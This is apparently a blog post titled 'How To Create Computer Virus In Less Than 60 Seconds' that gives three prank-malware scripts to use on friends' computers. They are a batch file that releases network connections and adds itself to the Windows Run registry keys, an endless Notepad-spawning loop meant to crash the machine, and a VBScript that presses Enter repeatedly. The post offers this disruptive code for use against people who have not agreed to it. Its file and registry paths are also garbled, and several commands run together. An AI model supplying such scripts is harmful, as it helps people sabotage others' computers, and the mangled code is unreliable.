How To Create Computer Virus In Less Than 60 Seconds

#1 Disable Internet Permanently

The below code will disable anyone’s internet connectivity PERMANENTLY.
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

#2 Endless Notepads

The below code will pop up endless notepads until the computer freezes and crashes!
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

#3 Endless Enter

The below code will make the enter button pressed continuously
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
So this is all about How To Create a Virus in Less Than 60 seconds. By this method, you can easily create the harmful and harmless virus and can make your friends fool. If you have some more tricks like this, you can share with us. Hope you like the post! Don’t forget to share this cool post with your friends.

Comments

Popular posts from this blog

Advantages and disadvantages of online shopping

How to set up a VPN in Windows

10 logos and their meaning.